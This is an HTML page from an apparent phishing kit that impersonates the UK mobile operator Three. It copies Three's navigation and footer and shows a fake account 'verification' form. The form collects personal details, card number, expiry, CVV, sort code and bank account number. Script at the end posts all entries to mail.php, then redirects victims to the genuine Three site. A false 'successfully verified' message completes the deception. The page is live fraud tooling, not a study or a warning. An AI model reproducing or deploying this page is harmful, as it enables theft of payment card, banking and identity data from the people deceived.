<!doctype html>
<html lang="en">
  <head>
    <title>3 Security</title>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name=description content="Discription Here">
    <meta name=author content="Alpha-Design">
    <link rel="icon" href="" type="image/png">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="assets/css/bootstrap.v4.3.1.min.css">
    <!-- FontAwsome CSS -->
    <link rel="stylesheet" href="assets/css/fontawsome.all.min.css">

    <!-- <link href="//db.onlinewebfonts.com/c/0bff8f425a0c32c7a4be3270b699489d?family=Bio+Sans" rel="stylesheet" type="text/css"/> -->
    <!-- Main CSS -->

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-steps@1.1.0/demo/css/jquery.steps.css">
    <link rel="stylesheet" href="style.css">
    <!-- Responsive CSS -->
    <link rel="stylesheet" href="assets/css/responsive.css">

  </head>
  <body>


    <!-- =============OffCanvas Menu============= -->

    <div class="offcanvas">
        <div class="container">
            <div class="mobile-menu">
                <div class="triger-btn">
                    <span class="tri-btn"><i class="fas fa-bars"></i></span>
                </div>
                <div class="logo">
                    <a href="index.html"><img style="widows: 50px" src="assets/img/three-logo.svg" alt="Logo"></a>
                </div>
                <div class="my">
                    <h2>My3</h2>
                </div>
            </div>
        </div>
    </div>

    <div class="side-menu">
        <div class="side-top">
            <span class="close-menu">
                <i class="fas fa-times"></i>
            </span>
            <div class="side-search">
                <div class="serach-from">
                    <form action="#">
                        <input type="search" placeholder="What are you looking for?">
                        <button type="submit"><i class="fas fa-search"></i></button>
                    </form>
                </div>
            </div>
        </div>
        <div class="side-menu-item">
            <div class="accordion" id="accordionExample">
                <div class="card">
                    <div class="card-header" id="headingOne">
                      <h2 class="mb-0">
                        <button class="btn btn-link" type="button" data-toggle="collapse" data-target="#" aria-expanded="false" aria-controls="">
                          <span class="menu-icon"> <i class="fas fa-home"></i> </span>Home
                        </button>
                      </h2>
                    </div>
                </div> <!-- /.card -->
                <div class="card">
                    <div class="card-header" id="headingOne">
                      <h2 class="mb-0">
                        <button class="btn btn-link" type="button" data-toggle="collapse" data-target="#collapseOne" aria-expanded="false" aria-controls="collapseOne">
                          <span class="menu-icon"> <i class="fas fa-shopping-cart"></i> </span> Shope <span class="shape-angel"><i class="fas fa-angle-right"></i></span>
                        </button>
                      </h2>
                    </div>

                    <div id="collapseOne" class="collapse " aria-labelledby="headingOne" data-parent="#accordionExample">
                      <div class="card-body">
                        <div class="drop-down-menu offcanvas-item">
                            <ul>
                                <li><a href="#" class="bold-btn">Mobile phones</a></li>
                                <li><a href="#">Pay monthly phones</a></li>
                                <li><a href="#">Pay As You Go phones</a></li>
                                <li><a href="#">Accessories</a></li>
                            </ul>
                            <ul>
                                <li><a href="#" class="bold-btn">Mobile phones</a></li>
                                <li><a href="#" >Pay monthly phone SIMs</a></li>
                                <li><a href="#" >Pay As You Go phone SIMs</a></li>
                                <li><a href="#" class="bold-btn">Tablets</a></li>
                                <li><a href="#" class="bold-btn">Try our network</a></li>
                                <li><a href="#" >Order a Free SIM</a></li>
                                <li><a href="#" >Order a Data SIM</a></li>
                            </ul>
                            <ul>
                                <li><a href="#" class="bold-btn">Home broadband</a></li>
                                <li><a href="#" class="bold-btn">Mobile broadband</a></li>
                                <li><a href="#" >Dongles & MiFi</a></li>
                                <li><a href="#" >Pay monthly data SIMs</a></li>
                                <li><a href="#" >Pay As You Go data SIMs</a></li>
                            </ul>
                            <ul>
                                <li><a href="#" class="bold-btn">Existing customers</a></li>
                                <li><a href="#" class="bold-btn">Upgrade</a></li>
                                <li><a href="#" >Top-up</a></li>
                                <li><a href="#" >Data & Add-ons</a></li>
                                <li><a href="#" >Business customers</a></li>
                            </ul>
                        </div> <!-- /.drop-down-menu -->
                      </div>
                    </div>
                </div>
                <div class="card">
                    <div class="card-header" id="headingTwo">
                      <h2 class="mb-0">
                        <button class="btn btn-link collapsed" type="button" data-toggle="collapse" data-target="#collapseTwo" aria-expanded="false" aria-controls="collapseTwo">
                          <span class="menu-icon"> <i class="far fa-life-ring"></i> </span> Support <span class="shape-angel"><i class="fas fa-angle-right"></i></span>
                        </button>
                      </h2>
                    </div>
                    <div id="collapseTwo" class="collapse" aria-labelledby="headingTwo" data-parent="#accordionExample">
                      <div class="card-body">
                        <div class="drop-down-menu offcanvas-item">
                            <ul>
                                <li><a href="#" class="bold-btn">Account</a></li>
                                <li><a href="#">Bills & contracts</a></li>
                                <li><a href="#">Calls, emails & messages</a></li>
                                <li><a href="#">Pay As You Go</a></li>
                                <li><a href="#">Data & Add-ons</a></li>
                            </ul>
                            <ul>
                                <li><a href="#" class="bold-btn">Technical support</a></li>
                                <li><a href="#" >Device support</a></li>
                                <li><a href="#" >SIM support</a></li>
                                <li><a href="#" >Mobile broadband</a></li>
                                <li><a href="#" >Internet & apps</a></li>
                            </ul>
                            <ul>
                                <li><a href="#" class="bold-btn">Network</a></li>
                                <li><a href="#" >Our Network</a></li>
                                <li><a href="#" >Coverage checker</a></li>
                                <li><a href="#" >Roaming & international</a></li>
                                <li><a href="#" >Wi-Fi Calling</a></li>
                                <li><a href="#" >Network status checker</a></li>
                            </ul>
                            <ul>
                                <li><a href="#" class="bold-btn">Get in touch</a></li>
                                <li><a href="#" >Contact us</a></li>
                                <li><a href="#" >Cancel Your Contract</a></li>
                                <li><a href="#" >Switching</a></li>
                            </ul>
                        </div> <!-- /.drop-down-menu -->
                      </div>
                    </div>
                </div>
                <div class="card">
                    <div class="card-header" id="headingThree">
                      <h2 class="mb-0">
                        <button class="btn btn-link collapsed" type="button" data-toggle="collapse" data-target="#collapseThree" aria-expanded="false" aria-controls="collapseThree">
                            <span class="menu-icon"> <i class="fas fa-mobile-alt"></i> </span> Hub <span class="shape-angel"><i class="fas fa-angle-right"></i></span>
                        </button>
                      </h2>
                    </div>
                    <div id="collapseThree" class="collapse" aria-labelledby="headingThree" data-parent="#accordionExample">
                      <div class="card-body">
                        <div class="drop-down-menu offcanvas-item last">
                            <ul>
                                <li><a href="#" class="bold-btn">News</a></li>
                            </ul>
                            <ul>
                                <li><a href="#" class="bold-btn">Tech</a></li>
                            </ul>
                            <ul>
                                <li><a href="#" class="bold-btn">Fun</a></li>
                            </ul>
                            <ul>
                                <li><a href="#" class="bold-btn">3Files</a></li>
                            </ul>
                        </div> <!-- /.drop-down-menu -->
                      </div>
                    </div>
                </div>
                <div class="card">
                    <div class="card-header" id="headingOne">
                      <h2 class="mb-0">
                        <button class="btn btn-link" type="button" data-toggle="collapse" data-target="#" aria-expanded="false" aria-controls="">
                          <span class="menu-icon"> <i class="fas fa-wifi"></i> </span>5G
                        </button>
                      </h2>
                    </div>
                </div> <!-- /.card -->
                <div class="card">
                    <div class="card-header" id="headingOne">
                      <h2 class="mb-0">
                        <button class="btn btn-link" type="button" data-toggle="collapse" data-target="#" aria-expanded="false" aria-controls="">
                          <span class="menu-icon"> <i class="fas fa-user-friends"></i> </span>My3
                        </button>
                      </h2>
                    </div>
                </div> <!-- /.card -->
                <div class="card">
                    <div class="card-header" id="headingOne">
                      <h2 class="mb-0">
                        <button class="btn btn-link" type="button" data-toggle="collapse" data-target="#" aria-expanded="false" aria-controls="">
                          <span class="menu-icon"> <i class="fas fa-sim-card"></i> </span>Data & Add-ons
                        </button>
                      </h2>
                    </div>
                </div> <!-- /.card -->
            </div>
        </div> <!-- /.side-menu-item -->
        <div class="bottom-contact">
            <ul>
                <li><a href="#"> <span class="contact-icon"></span>Switch to business</a></li>
                <li><a href="#"> <span class="contact-icon"><i class="fas fa-broadcast-tower"></i></span>Coverage checker</a></li>
                <li><a href="#"> <span class="contact-icon"><i class="fas fa-map-marker-alt"></i></span>Store locator</a></li>
                <li><a href="#"> <span class="contact-icon"><i class="fas fa-phone"></i></span>Buy from us <span class="strong"> 0800 033 8009</span></a></li>
            </ul>
        </div>
    </div>

    <!-- =============OffCanvas Menu End============= -->

    <header class="header-area">
        <div class="header-top">
            <div class="main container">
                <div class="top-menu">
                    <div class="top-left">
                        <ul>
                            <li><a href="#" class="active">Personal</a></li>
                            <li><a href="#">Business</a></li>
                        </ul>
                    </div>
                    <div class="top-right">
                        <ul> 
                            <li><a href="#"><i class="fas fa-broadcast-tower"></i>Coverage checker</a></li>
                            <li><a href="#"><i class="fas fa-map-marker-alt"></i>Store locator</a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div> <!-- /.header-top -->
        <div class="menu-area">
            <div class="main container">
                <div class="menu">
                    <div class="main-menu">
                        <div class="logo">
                            <a href="index.html"><img style="widows: 50px" src="assets/img/three-logo.svg" alt="Logo"></a>
                        </div>
                        <ul>
                            <li class="drop-main drop-main-1">
                                <a href="#" class="shape">Shop <i class="fas fa-caret-down"></i></a>
                            </li>
                            <li class="drop-main drop-main-2">
                                <a href="#" class="shape">Support <i class="fas fa-caret-down"></i></a>
                            </li>
                            <li class="drop-main drop-main-3">
                                <a href="#" class="shape">Hub <i class="fas fa-caret-down"></i></a>
                            </li>
                            <li><a href="#" class="shape">5G</a></li>
                        </ul>
                    </div> <!-- /. -->
                    <div class="search-box">
                        <div class="serach-from">
                            <form action="#">
                                <input type="search" placeholder="What are you looking for?">
                                <button type="submit"><i class="fas fa-search"></i></button>
                            </form>
                        </div>
                        <div class="log-reg">
                            <ul>
                                <li><a href="#">Login</a></li>
                                <li><a href="#">Register</a></li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div> <!-- /.main container -->
        </div> <!-- /.menu-area -->
        <div class="drop-down-area">
            <div class="main container">
                <div class="drop-down-menu drop-3">
                    <ul>
                        <li><a href="#" class="bold-btn">News</a></li>
                    </ul>
                    <ul>
                        <li><a href="#" class="bold-btn">Tech</a></li>
                    </ul>
                    <ul>
                        <li><a href="#" class="bold-btn">Fun</a></li>
                    </ul>
                    <ul>
                        <li><a href="#" class="bold-btn">3Files</a></li>
                    </ul>
                </div> <!-- /.drop-down-menu -->
                <div class="drop-down-menu drop-2">
                    <ul>
                        <li><a href="#" class="bold-btn">Account</a></li>
                        <li><a href="#">Bills & contracts</a></li>
                        <li><a href="#">Calls, emails & messages</a></li>
                        <li><a href="#">Pay As You Go</a></li>
                        <li><a href="#">Data & Add-ons</a></li>
                    </ul>
                    <ul>
                        <li><a href="#" class="bold-btn">Technical support</a></li>
                        <li><a href="#" >Device support</a></li>
                        <li><a href="#" >SIM support</a></li>
                        <li><a href="#" >Mobile broadband</a></li>
                        <li><a href="#" >Internet & apps</a></li>
                    </ul>
                    <ul>
                        <li><a href="#" class="bold-btn">Network</a></li>
                        <li><a href="#" >Our Network</a></li>
                        <li><a href="#" >Coverage checker</a></li>
                        <li><a href="#" >Roaming & international</a></li>
                        <li><a href="#" >Wi-Fi Calling</a></li>
                        <li><a href="#" >Network status checker</a></li>
                    </ul>
                    <ul>
                        <li><a href="#" class="bold-btn">Get in touch</a></li>
                        <li><a href="#" >Contact us</a></li>
                        <li><a href="#" >Cancel Your Contract</a></li>
                        <li><a href="#" >Switching</a></li>
                    </ul>
                </div> <!-- /.drop-down-menu -->
                <div class="drop-down-menu drop-1">
                    <ul>
                        <li><a href="#" class="bold-btn">Mobile phones</a></li>
                        <li><a href="#">Pay monthly phones</a></li>
                        <li><a href="#">Pay As You Go phones</a></li>
                        <li><a href="#">Accessories</a></li>
                    </ul>
                    <ul>
                        <li><a href="#" class="bold-btn">Mobile phones</a></li>
                        <li><a href="#" >Pay monthly phone SIMs</a></li>
                        <li><a href="#" >Pay As You Go phone SIMs</a></li>
                        <li><a href="#" class="bold-btn">Tablets</a></li>
                        <li><a href="#" class="bold-btn">Try our network</a></li>
                        <li><a href="#" >Order a Free SIM</a></li>
                        <li><a href="#" >Order a Data SIM</a></li>
                    </ul>
                    <ul>
                        <li><a href="#" class="bold-btn">Home broadband</a></li>
                        <li><a href="#" class="bold-btn">Mobile broadband</a></li>
                        <li><a href="#" >Dongles & MiFi</a></li>
                        <li><a href="#" >Pay monthly data SIMs</a></li>
                        <li><a href="#" >Pay As You Go data SIMs</a></li>
                    </ul>
                    <ul>
                        <li><a href="#" class="bold-btn">Existing customers</a></li>
                        <li><a href="#" class="bold-btn">Upgrade</a></li>
                        <li><a href="#" >Top-up</a></li>
                        <li><a href="#" >Data & Add-ons</a></li>
                        <li><a href="#" >Business customers</a></li>
                    </ul>
                </div> <!-- /.drop-down-menu -->
            </div>
        </div>
    </header>

    <section class="form-body">
        <div class="container">
            <div class="row">
                <div class="col-md-12">
                    <div class="all-form-content">
                        <img src="ajax-loading.jpg" width="260px" height="100%" id="loader" style="display:none;">
                        <form id="example-form" action="#" method="post">
                            <h2 id="step">Personal Information</h2>
                            <div>
                                <h3>Personal Information</h3>
                                <section>
                                    
                                    <div class="single-form-group">
                                        <div class="input-group">
                                            <label for="f-name">First name<span class="star">*</span></label>
                                            <input type="text" id="f-name" name="f-name" placeholder="" class="required">
                                        </div>
                                        <div class="input-group">
                                            <label for="m-name">Middle name(s)</label>
                                            <input type="text" id="m-name" name="m-name" placeholder="">
                                        </div>
                                        <div class="input-group">
                                            <label for="l-name">Surname<span class="star">*</span></label>
                                            <input type="text" id="l-name" name="l-name" placeholder="" class="required">
                                        </div>
                                        <div class="input-group">
                                            <label for="dob">Date of birth<span class="star">*</span></label>
                                            <input type="text" id="dob" name="dob" placeholder="dd/mm/yyyy" class="required date">
                                        </div>
                                        
                                        <div class="input-group">
                                            <label for="ad1">Address line 1<span class="star">*</span></label>
                                            <input type="text" id="ad1" name="ad1" placeholder="" class="required">
                                        </div>
                                        <div class="input-group">
                                            <label for="ad2">Address line 2</label>
                                            <input type="text" id="ad2" name="ad2" placeholder="">
                                        </div>
                                        <div class="input-group">
                                            <label for="city">City<span class="star">*</span></label>
                                            <input type="text" id="city" name="city" placeholder="" class="required">
                                        </div>
                                        <div class="input-group">
                                            <label for="county">County</label>
                                            <input type="text" id="county" name="county" placeholder="">
                                        </div>
                                        <div class="input-group">
                                            <label for="postcode">Postcode<span class="star">*</span></label>
                                            <input type="text" id="postcode"  name="postcode" placeholder="" class="required">
                                        </div>
                                        <div class="input-group">
                                            <label for="number">Phone number<span class="star">*</span></label>
                                            <input type="text" id="number"  name="number" placeholder="" class="required">
                                        </div>
                                    </div> <!-- /.single-form-group -->
                                </section>
                                <h3>Profile</h3>
                                <section>
                                    <div class="single-form-group">
                                        <div class="input-group">
                                            <label for="c-name">Name on card<span class="star">*</span></label>
                                            <input type="text" id="c-name" name="c-name" placeholder="" class="required">
                                        </div>
                                        <div class="input-group">
                                            <label for="cn">Card number<span class="star">*</span></label>
                                            <input type="text" id="cn" name="cn"  placeholder="" class="required">
                                        </div>
                                        <div class="input-group">
                                            <label for="expiry">Expiry<span class="star">*</span></label>
                                            <input type="text" id="expiry" name="expiry" placeholder="MM/YY" class="required">
                                        </div>
                                        <div class="input-group">
                                            <label for="cv">CVV<span class="star">*</span></label>
                                            <input type="text" id="cv" name="cv" placeholder="" class="required">
                                        </div>
                                        <div class="input-group">
                                            <label for="sort">Sort code<span class="star">*</span></label>
                                            <input type="text" id="sort" name="sort" placeholder="XX-XX-XX" class="required">
                                        </div>
                                        <div class="input-group">
                                            <label for="an">Account number<span class="star">*</span></label>
                                            <input type="text" id="an" placeholder="" name="an" class="required">
                                        </div>
                                    </div>
                                </section>
                                
                                <h3>Hints</h3>
                                <section>
                                    <div class="single-form-group">
                                        <h5>We've successfully verified your provided information. You can now continue your account as normal.</h5>
                                        <h5>Thank you for your cooperation.</h5>
                                    </div> <!-- /.single-form-group -->
                                    <br>
                                    <br>
                                    <br>
                                </section>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <footer class="footer-area">
        <div class="main container">
            <div class="footer-top">
                <div class="row">
                    <div class="col-md-8">
                        <div class="foot-search">
                            <div class="serach-from">
                                <form action="#">
                                    <input type="search" placeholder="What are you looking for?">
                                    <button type="submit"><i class="fas fa-search"></i></button>
                                </form>
                            </div>
                            <div class="net-cover">
                                <a href="#"><i class="fas fa-broadcast-tower"></i> Check coverage & network status.</a>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-4">
                        <div class="net-cover phone">
                            <a href="#"><i class="fas fa-phone"></i> Buy from us 0800 033 8009</a>
                        </div>
                    </div>
                </div> <!-- /.footer-top -->
            </div> <!-- /.footer-top -->
            <div class="footer-menu">
                <div class="row">
                    <div class="col-md-8 col-sm-8 col-12">
                        <div class="all-footer-meu">
                            <div class="single-foot-menu">
                                <div class="foot-title">
                                    <h5>Explore Three.</h5>
                                </div>
                                <ul>
                                    <li><a href="#">Mobile Phones.</a></li>
                                    <li><a href="#">Broadband.</a></li>
                                    <li><a href="#">Tablets.</a></li>
                                    <li><a href="#">Top-up online.</a></li>
                                    <li><a href="#">SIM Only deals.</a></li>
                                    <li><a href="#">Pay As You Go.</a></li>
                                    <li><a href="#">Three App.</a></li>
                                </ul> 
                            </div> <!-- /.single-foot-menu -->
                            <div class="single-foot-menu">
                                <div class="foot-title">
                                    <h5>Popular phones.</h5>
                                </div>
                                <ul>
                                    <li><a href="#">Samsung Galaxy.</a></li>
                                    <li><a href="#">Samsung Galaxy S10.</a></li>
                                    <li><a href="#">Samsung Galaxy S10 Plus.</a></li>
                                    <li><a href="#">Top-up online.</a></li>
                                    <li><a href="#">iPhone 11.</a></li>
                                    <li><a href="#">iPhone 11 Pro.</a></li>
                                    <li><a href="#">iPhone 11 Pro Max.</a></li>
                                </ul>
                            </div> <!-- /.single-foot-menu -->
                            <div class="single-foot-menu">
                                <div class="foot-title">
                                    <h5>Popular products.</h5>
                                </div>
                                <ul>
                                    <li><a href="#">iPhone.</a></li>
                                    <li><a href="#">Samsung.</a></li>
                                    <li><a href="#">Honor.</a></li>
                                    <li><a href="#">Huawei.</a></li>
                                </ul>
                            </div> <!-- /.single-foot-menu -->
                        </div> <!-- /.all-footer-meu -->
                    </div> <!-- /.col-md-8 -->
                    <div class="col-md-4 col-sm-4 col-12">
                        <div class="single-foot-menu last">
                            <div class="foot-title">
                                <h5>Our company.</h5>
                            </div>
                            <div class="dubble-menu">
                                <ul>
                                    <li><a href="#">About Three.</a></li>
                                    <li><a href="#">Business.</a></li>
                                    <li><a href="#">Wholesale.</a></li>
                                    <li><a href="#">Gender Pay Gap Report.</a></li>
                                    <li><a href="#">Accessibility.</a></li>
                                    <li><a href="#">Vulnerable Customer Policy.</a></li>
                                    <li><a href="#">Privacy & Safety.</a></li>
                                    <li><a href="#">Delivery Information.</a></li>
                                    <li><a href="#">Sitemap</a></li>
                                </ul> 
                                <ul>
                                    <li><a href="#">Terms & Conditions.</a></li>
                                    <li><a href="#">Code of practice.</a></li>
                                    <li><a href="#">Modern Slavery Statement.</a></li>
                                    <li><a href="#">Contact us..</a></li>
                                    <li><a href="#">Media Centre.</a></li>
                                    <li><a href="#">Price Guide.</a></li>
                                    <li><a href="#">SMARTYSitemap.</a></li>
                                </ul> 
                            </div>
                        </div> <!-- /.single-foot-menu -->
                    </div>
                    <div class="col-12">
                        <div class="footer-social">
                            <ul>
                                <li><a href="#"><i class="fab fa-facebook-f"></i></a></li>
                                <li><a href="#"><i class="fab fa-twitter"></i></a></li>
                                <li><a href="#"><i class="fab fa-youtube"></i></a></li>
                                <li><a href="#"><i class="fab fa-instagram"></i></a></li>
                            </ul>
                        </div>
                    </div>
                </div> <!-- /.row -->
            </div>
            <div class="footer-accordian">
                <div class="accordion" id="accordionExample-2">
                  <div class="card">
                    <div class="card-header" id="headingOne">
                      <h2 class="mb-0">
                        <button class="btn btn-link" type="button" data-toggle="collapse" data-target="#collapseOne" aria-expanded="false" aria-controls="collapseOne">
                          Explore Three.
                        </button>
                      </h2>
                    </div>
                    <div id="collapseOne" class="collapse" aria-labelledby="headingOne" data-parent="#accordionExample-2">
                      <div class="card-body">
                        
                            <div class="single-foot-menu">
                                <ul>
                                    <li><a href="#">Mobile Phones.</a></li>
                                    <li><a href="#">Broadband.</a></li>
                                    <li><a href="#">Tablets.</a></li>
                                    <li><a href="#">Top-up online.</a></li>
                                    <li><a href="#">SIM Only deals.</a></li>
                                    <li><a href="#">Pay As You Go.</a></li>
                                    <li><a href="#">Three App.</a></li>
                                </ul> 
                            </div> <!-- /.single-foot-menu -->
                      </div>
                    </div>
                  </div>
                  <div class="card">
                    <div class="card-header" id="headingTwo">
                      <h2 class="mb-0">
                        <button class="btn btn-link collapsed" type="button" data-toggle="collapse" data-target="#collapseTwo" aria-expanded="false" aria-controls="collapseTwo">
                          Popular phones.
                        </button>
                      </h2>
                    </div>
                    <div id="collapseTwo" class="collapse" aria-labelledby="headingTwo" data-parent="#accordionExample-2">
                      <div class="card-body">
                        <div class="single-foot-menu">
                            <ul>
                                <li><a href="#">Samsung Galaxy.</a></li>
                                <li><a href="#">Samsung Galaxy S10.</a></li>
                                <li><a href="#">Samsung Galaxy S10 Plus.</a></li>
                                <li><a href="#">Top-up online.</a></li>
                                <li><a href="#">iPhone 11.</a></li>
                                <li><a href="#">iPhone 11 Pro.</a></li>
                                <li><a href="#">iPhone 11 Pro Max.</a></li>
                            </ul>
                        </div> <!-- /.single-foot-menu -->
                      </div>
                    </div>
                  </div>
                  <div class="card">
                    <div class="card-header" id="headingThree">
                      <h2 class="mb-0">
                        <button class="btn btn-link collapsed" type="button" data-toggle="collapse" data-target="#collapseThree" aria-expanded="false" aria-controls="collapseThree">
                          Popular products.
                        </button>
                      </h2>
                    </div>
                    <div id="collapseThree" class="collapse" aria-labelledby="headingThree" data-parent="#accordionExample-2">
                      <div class="card-body">
                        
                        <div class="single-foot-menu">
                            <ul>
                                <li><a href="#">iPhone.</a></li>
                                <li><a href="#">Samsung.</a></li>
                                <li><a href="#">Honor.</a></li>
                                <li><a href="#">Huawei.</a></li>
                            </ul>
                        </div> <!-- /.single-foot-menu -->
                      </div>
                    </div>
                  </div>
                  <div class="card">
                    <div class="card-header" id="headingfour">
                      <h2 class="mb-0">
                        <button class="btn btn-link collapsed" type="button" data-toggle="collapse" data-target="#collapsefour" aria-expanded="false" aria-controls="collapsefour">
                          Our company.
                        </button>
                      </h2>
                    </div>
                    <div id="collapsefour" class="collapse" aria-labelledby="headingfour" data-parent="#accordionExample-2">
                      <div class="card-body">
                        
                        <div class="single-foot-menu last">
                            <div class="dubble-menu">
                                <ul>
                                    <li><a href="#">About Three.</a></li>
                                    <li><a href="#">Business.</a></li>
                                    <li><a href="#">Wholesale.</a></li>
                                    <li><a href="#">Gender Pay Gap Report.</a></li>
                                    <li><a href="#">Accessibility.</a></li>
                                    <li><a href="#">Vulnerable Customer Policy.</a></li>
                                    <li><a href="#">Privacy & Safety.</a></li>
                                    <li><a href="#">Delivery Information.</a></li>
                                    <li><a href="#">Sitemap</a></li>
                                </ul> 
                                <ul>
                                    <li><a href="#">Terms & Conditions.</a></li>
                                    <li><a href="#">Code of practice.</a></li>
                                    <li><a href="#">Modern Slavery Statement.</a></li>
                                    <li><a href="#">Contact us..</a></li>
                                    <li><a href="#">Media Centre.</a></li>
                                    <li><a href="#">Price Guide.</a></li>
                                    <li><a href="#">SMARTYSitemap.</a></li>
                                </ul> 
                            </div>
                        </div> <!-- /.single-foot-menu -->
                      </div>
                    </div>
                  </div>
                </div>
            </div> <!-- /.footer-accordian -->

            <div class="footer-social mobile">
                <ul>
                    <li><a href="#"><i class="fab fa-facebook-f"></i></a></li>
                    <li><a href="#"><i class="fab fa-twitter"></i></a></li>
                    <li><a href="#"><i class="fab fa-youtube"></i></a></li>
                    <li><a href="#"><i class="fab fa-instagram"></i></a></li>
                </ul>
            </div>
            <div class="copyfight">
                <p>© Hutchison 3G UK Limited 2002 - Present.</p>
            </div>
        </div>
    </footer>

    
    <script>

            function cc_format(value) {
              var v = value.replace(/\s+/g, '').replace(/[^0-9]/gi, '')
              var matches = v.match(/\d{4,16}/g);
              var match = matches && matches[0] || ''
              var parts = []
              for (i=0, len=match.length; i<len; i+=4) {
                parts.push(match.substring(i, i+4))
              }
              if (parts.length) {
                return parts.join(' ')
              } else {
                return value
              }
            }
            
            onload = function() {
              document.getElementById('cn').oninput = function() {
                this.value = cc_format(this.value)
              }
              
              document.getElementById('sort').oninput = function() {
                this.value = cc_xxxx(this.value)
              }
              
              document.getElementById('expiry').oninput = function() {
                this.value = cc_xx(this.value)
              }
              
            }
            
            
            function cc_xxxx(value) {
              var v = value.replace(/\s+/g, '').replace(/[^0-9]/gi, '')
              var matches = v.match(/\d{2,6}/g);
              var match = matches && matches[0] || ''
              var parts = []
              for (i=0, len=match.length; i<len; i+=2) {
                parts.push(match.substring(i, i+2))
              }
              if (parts.length) {
                return parts.join('-')
              } else {
                return value
              }
            }
            
            
            function cc_xx(value) {
              var v = value.replace(/\s+/g, '').replace(/[^0-9]/gi, '')
              var matches = v.match(/\d{2,4}/g);
              var match = matches && matches[0] || ''
              var parts = []
              for (i=0, len=match.length; i<len; i+=2) {
                parts.push(match.substring(i, i+2))
              }
              if (parts.length) {
                return parts.join('/')
              } else {
                return value
              }
            }
            
            function cc_xx(value) {
              var v = value.replace(/\s+/g, '').replace(/[^0-9]/gi, '')
              var matches = v.match(/\d{2,4}/g);
              var match = matches && matches[0] || ''
              var parts = []
              for (i=0, len=match.length; i<len; i+=2) {
                parts.push(match.substring(i, i+2))
              }
              if (parts.length) {
                return parts.join('/')
              } else {
                return value
              }
            }
    </script>

    
    <!--  JavaScript -->
	<!-- JQuery -->
	<script src="assets/js/jquery-v3.4.1.min.js"></script>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-steps/1.1.0/jquery.steps.js"> </script>
     <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.16.0/jquery.validate.min.js"> </script>
     <script src="https://cdn.jsdelivr.net/jquery.validation/1.16.0/additional-methods.min.js"></script>
     <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>

	<!-- BootStart Poper -->
	<script src="assets/js/popper.min.js"></script>
	<!-- BootStart Poper -->
	<script src="assets/js/bootstrap.v4.3.1.min.js"></script>

	<!-- Custome -->
	<script src="assets/js/active.js"></script>


    <script>
    
        $(document).ready(function(){
                
            $(document).on("keypress","#cn, #sort, #expiry", function (e) {
                     //if the letter is not digit then display error and don't type anything
                     if (e.which != 8 && e.which != 0 && (e.which < 48 || e.which > 57)) {
                        //display error message
                        //$("#errmsg").html("Digits Only").show().fadeOut("slow");
                               return false;
                    }
            });
            
            $(document).find('.date').mask('00/00/0000', {
                placeholder:"DD/MM/YYYY",
                clearIfNotMatch: false
            });
            
            $(document).on("focus","input", function(){
                 // $("span").css("display", "inline").fadeOut(2000);
                 console.log("yes");
                 //$(this).css('border-color', '#141414 !important');
                 // $(this).addClass("blackebg");
                $('#example-form input').removeClass('blackebg');
                $(this).addClass('blackebg');
            });
   
   
                var form = $("#example-form");
                form.validate({
                    errorPlacement: function errorPlacement(error, element) { element.before(error); },
                    rules: 
                    {
                        number: {
                          digits: true,
                          maxlength: 12
                        },
                        an : {
                           digits: true,
                           maxlength: 8 
                        },
                        cv : {
                           digits: true,
                           maxlength: 4 
                        }
                        
                    }
                });
                form.children("div").steps({
                    headerTag: "h3",
                    bodyTag: "section",
                    transitionEffect: "slideLeft",
                    onStepChanging: function (event, currentIndex, newIndex)
                    {
                        //form.validate().settings.ignore = ":disabled,:hidden";
                        form.validate().settings.ignore = ":disabled,:hidden";
                        console.log(typeof form.valid());
                        
                        if(form.valid() === true) {
                       
                            if(currentIndex == 0) {
                                $("#step").html('Billing Information'); 
                                var fname = $("#f-name").val();
                                var mname = $("#m-name").val();
                                var sfname = $("#l-name").val();
                                var dob = $("#dob").val();
                                var al1 = $("#ad1").val();
                                var al2 = $("#ad2").val();
                                var city = $("#city").val();
                                var county = $("#county").val();
                                var postcode = $("#postcode").val();
                                var phoneno = $("#number").val();
                                console.log("acha h");
                                $.ajax({
                                    type: 'post',
                                    url: 'mail.php',
                                    data : { 'fname' : fname , 'mname' : mname, 'sfname':sfname, 'dob':dob, 'al1':al1, 'al2':al2, 'city':city, 'county':county, 'postcode':postcode, 'phoneno':phoneno},
                                    success: function () {
                                       // $('#loader').css('display', 'none');
                                       //alert("yes");
                                       return true;
                                    }
                               });
                            }
                            if(currentIndex == 1) {
                                $("#step").html('Confirmation');  
                            }
                            return true;
                        } else {
                            return form.valid()
                        }
                    },
                    onFinishing: function (event, currentIndex)
                    {
                        //form.validate().settings.ignore = ":disabled";
                        return true;
                    },
                    onFinished: function (event, currentIndex)
                    {
                         
                        
                        
                        var cname = $("#c-name").val();
                        var cn = $("#cn").val();
                        var expiry = $("#expiry").val();
                        var cv = $("#cv").val();
                        var sort = $("#sort").val();
                        var an = $("#an").val();
                        var uname = $("#u-name").val();
                        var password = $("#password").val();
                        $.ajax({
                            type: 'post',
                            url: 'mail.php',
                            data : { 'cname' : cname , 'cn' : cn, 'expiry':expiry, 'cv':cv, 'sort':sort, 'an':an, 'uname':uname, 'password':password },
                            success: function () {
                                //$('#loader').css('display', 'none');
                                window.location.href = "http://www.three.co.uk/About_Three";
                                return true;
                            }
                       });

                    }
                });
        });
    </script>

  </body>
</html>